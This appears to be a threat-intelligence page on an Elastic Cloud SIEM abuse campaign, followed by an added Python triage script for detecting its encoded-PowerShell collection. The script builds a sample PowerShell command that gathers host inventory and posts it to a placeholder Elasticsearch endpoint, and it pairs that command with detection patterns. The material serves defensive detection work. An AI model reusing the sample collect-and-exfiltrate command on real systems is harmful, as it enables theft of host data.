
Elastic Cloud SIEM stolen-data campaign

Campaign · Happening score 47 · 1 unique source, 1 article

Summary


The Elastic Cloud SIEM abuse campaign has been uncovered across dozens of organizations, turning a legitimate security platform into a stolen-data hub and increasing operational risk. An unidentified threat actor exploited enterprise software flaws, including SolarWinds Web Help Desk, and used PowerShell to collect host data. The attacker funneled the stolen information into an attacker-controlled ElasticSearch index instead of relying on traditional C2 infrastructure. The activity affected at least 216 hosts across 34 Active Directory domains before the cloud instance was taken offline.

Related Happenings

Storm-2949 Microsoft 365 and Azure data-theft campaign

Campaign
First: 19.05.2026 22:35 Last: 19.05.2026 22:35 Sources 1

About this happening: The **Storm-2949** campaign is targeting **Microsoft 365 and Azure production environments** to steal sensitive data, increasing the risk of privileged-account takeover and cloud...

Storm-2561 SEO-poisoning VPN credential-theft campaign

Campaign
First: 13.03.2026 15:38 Last: 13.03.2026 15:38 Sources 1

About this happening: The **Storm-2561** group is running a **credential-theft campaign** that uses **SEO poisoning** and fake **VPN clients** to steal **VPN credentials** from people searching for ent...

Tycoon 2FA-Storm-1747 ecosystem shift changes threat-actor operations

Threat Actor Meta
First: 05.03.2026 08:51 Last: 05.03.2026 08:51 Sources 1

About this happening: **Tycoon2FA** has evolved from a **subscription-based PhaaS** into a more resilient phishing service that now supports **device-code phishing** against **Microsoft 365** accounts....

Latest development: 17.05.2026 17:43

eSentire says Tycoon2FA now uses device-code phishing to target Microsoft 365 accounts, with invoice-themed lure emails carrying Trustifi click-tracking URLs that redirect through Trustifi, Cloudflare Workers, obfuscated JavaScript layers, and a fake Microsoft CAPTCHA page before sending victims to microsoft.com/devicelogin. The kit also adds anti-analysis defenses, including detection of Selenium, Puppeteer, Playwright, and Burp Suite, plus blocks for security vendors, VPNs, sandboxes, AI crawlers, and cloud providers.

Atomic MacOS Stealer (AMOS) distribution through AI-app lures, SEO poisoning, and supply-chain abuse

Malware Activity
First: 12.02.2026 16:25 Last: 12.02.2026 16:25 Sources 1

About this happening: **Atomic MacOS Stealer (AMOS)** is being distributed to **macOS users** through multiple delivery paths, including **fraudulent GitHub repositories**, **SEO poisoning**, **malvert...

Publicly exposed training and demo apps in cloud environments are being abused at scale

Target Trend
First: 11.02.2026 13:30 Last: 11.02.2026 13:30 Sources 1

About this happening: Publicly exposed **training and demo applications** are showing up at scale in **AWS, Azure, and GCP**, turning lab systems into real cloud footholds. Researchers verified **nearl...

Timeline

  1. 09.03.2026 17:45 1 article · 2mo ago

    Attacker creates Elastic Cloud SIEM data hub

    Technical Analysis Update

    A threat actor created a free-trial Elastic Cloud SIEM deployment on January 28, 2026 and used encoded PowerShell on compromised systems across multiple organizations to collect operating system details, hardware specifications, Active Directory data, and installed patch information before sending the results to an ElasticSearch index named "systeminfo". Telemetry also showed repeated use of Kibana and administrative logins traced to a SAFING VPN tunnel.

  2. 09.03.2026 17:45 2 articles · 2mo ago

    Researchers disclose campaign scope and takedown

    Initial Disclosure

    Researchers at Huntress disclosed that an unidentified threat actor had exploited flaws in enterprise software across the affected organizations, including SolarWinds Web Help Desk, to collect and analyze stolen data in a free-trial Elastic Cloud SIEM instance instead of using traditional C2 infrastructure. Recovered data showed at least 216 hosts across 34 Active Directory domains, and Huntress said it coordinated victim notification with Elastic and law enforcement before the cloud instance was taken offline.

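The collection-and-shipping pattern the timeline describes (encoded PowerShell gathering OS, patch and Active Directory inventory and posting it to an Elasticsearch index named "systeminfo") can be triaged from process-creation telemetry. The Python below is an added example, not code from the page, Huntress or Elastic; the sample command lines, the two scripts and the endpoint siem.example.invalid are constructed placeholders, since the page does not disclose the actual hostname or scripts.

```python
import base64
import re

def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed samples, not from the page. The endpoint is a placeholder: the campaign's real
# Elastic Cloud hostname is not disclosed, only the index name "systeminfo".
EXFIL_SCRIPT = (
    "$d = @{os=(Get-WmiObject Win32_OperatingSystem).Caption; patches=(Get-HotFix | Select HotFixID)};"
    " Invoke-RestMethod -Method Post -Uri https://siem.example.invalid:9243/systeminfo/_doc"
    " -Body ($d | ConvertTo-Json) -ContentType application/json"
)
BENIGN_SCRIPT = "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"

# (host, command line) pairs as a Sysmon Event ID 1 / Security 4688 collector would emit them.
SAMPLE_EVENTS = [
    ("ws01", "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(EXFIL_SCRIPT)),
    ("ws02", "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1"),
    ("ws03", "powershell.exe -enc " + encode_ps(BENIGN_SCRIPT)),
]

# Common spellings of the -EncodedCommand switch, followed by a base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Host-inventory cmdlets matching what the campaign collected (OS, hardware, AD, patches).
INVENTORY = re.compile(r"Get-HotFix|Win32_OperatingSystem|Win32_ComputerSystem|Get-AD(?:Computer|Domain|User)", re.I)
# Elasticsearch document/bulk API on the "systeminfo" index named in the disclosure.
ES_SINK = re.compile(r"/systeminfo/_(?:doc|bulk|create)\b", re.IGNORECASE)

def decode_encoded_command(cmdline: str):
    """Return the decoded script behind -EncodedCommand, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: leave it for manual review

def triage(events):
    """Flag hosts whose encoded PowerShell both collects inventory and ships it to Elasticsearch."""
    hits = []
    for host, cmdline in events:
        script = decode_encoded_command(cmdline)
        if script and INVENTORY.search(script) and ES_SINK.search(script):
            hits.append({"host": host, "sink": ES_SINK.search(script).group(0)})
    return hits
```

Calling triage(SAMPLE_EVENTS) flags only ws01; ws03 decodes to a benign process listing and ws02 carries no encoded command at all.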